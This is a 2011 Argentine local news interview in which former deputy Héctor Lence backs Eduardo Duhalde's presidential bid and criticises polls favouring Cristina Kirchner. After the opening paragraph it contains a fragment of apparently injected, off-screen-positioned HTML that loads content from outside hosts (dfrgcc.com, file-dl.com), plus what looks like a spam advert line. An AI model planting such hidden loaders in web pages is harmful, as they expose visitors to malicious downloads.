04/02/2011, Locales

Lence: “Duhalde es el único que puede recuperar el equilibrio y poner el orden que Argentina necesita”

En declaraciones para El Retrato de Hoy, el Diputado Nacional (M.C.) Héctor Lence (FOTO) habló acerca de su visión acerca de la actualidad política e hizo hincapié en que “Duhalde demostró con hechos que es el único capaz de recuperar el equilibrio de la democracia y de poner el orden necesario que el país necesita”.

/ src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

Con respecto a su opinión acerca de las internas, Lence respondió: “Yo creo que la realización de las internas es la mejor opción. El sistema democrático se está convirtiendo en un sistema donde los candidatos son elegidos por una persona. Donde los partidos se van creando en torno a una persona política. Y no estoy de acuerdo con que todos los candidatos se elijan a dedo. La gente está esperando elegir a sus candidatos. Y es lo que Duhalde viene manifestando hace mucho tiempo.”

Acerca de cuáles serían las posibles alianzas, Lence fue categórico: “Todo abril y todo mayo se estarán realizando internas por regiones, para terminar la primera semana de junio, que viene la época de las alianzas. Por tal motivo estimo prematuro hablar de eso ahora. Para nosotros - y acá le hablo como un integrante más de Consenso Duhalde 2011 - el único candidato es Eduardo Duhalde”.

Ante la pregunta sobre quienes conforman Consenso Duhalde 2011, Lence dijo que “Consenso es un espacio pensado para apoyar la candidatura de Duhalde. Si bien está conformado por diferentes agrupaciones y espacios, también tiene en su haber grupos independientes que decidieron apostar a futuro acá. Entre sus integrantes se encuentra la Agrupación Vecinal Mar del Plata 2000, la Comisión de Intereses Marítimos y Pesquero de la Asociación de F. del Puerto , el Grupo Comunitario Mi Casita, la Agrupación Nuevo Rumbo, la Agrupación Duhaldista de Batán, la Agrupación Los Leales, la Asociación Civil Grupo Sudeste, la Agrupación Juan Manuel de Rosas y la Asociación de Comerciantes Paseo Banquina de Pescadores”.

Con respecto a las mediciones que indicarían un fuerte número a favor de Cristina, Lence aseguró que “Ellos tienen un solo candidato, que es Cristina Kirchner y hoy no pasa la segunda vuelta”. Y prosiguió: “Se lo voy a describir con una metáfora, que usted sabe que me gustan mucho: Dicen que un hombre caminaba con su hijo por el campo y le preguntó si escuchaba algo más que el cantar de los pájaros. El hijo le dijo que sí, pero que además escuchaba el ruido de una carreta. El padre, entusiasmado, lo interrogó acerca de si la carreta iba llena. El joven se sorprendió y le preguntó cómo saber si la carreta iba llena o vacía. A lo que el padre le respondió: Es muy fácil saber cuándo una carreta está vacía. Es por el ruido que hace. Cuanto más vacía la carreta, mayor es el ruido que hace.”

Y finalizó: “Eso es lo que está pasando en la Argentina. Lo que yo le pediría es que esas encuestas que tanto dicen, las repitieran cuando cada partido político tenga un solo candidato. Mientras eso no suceda, todo lo que se hable será sin sentido”.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy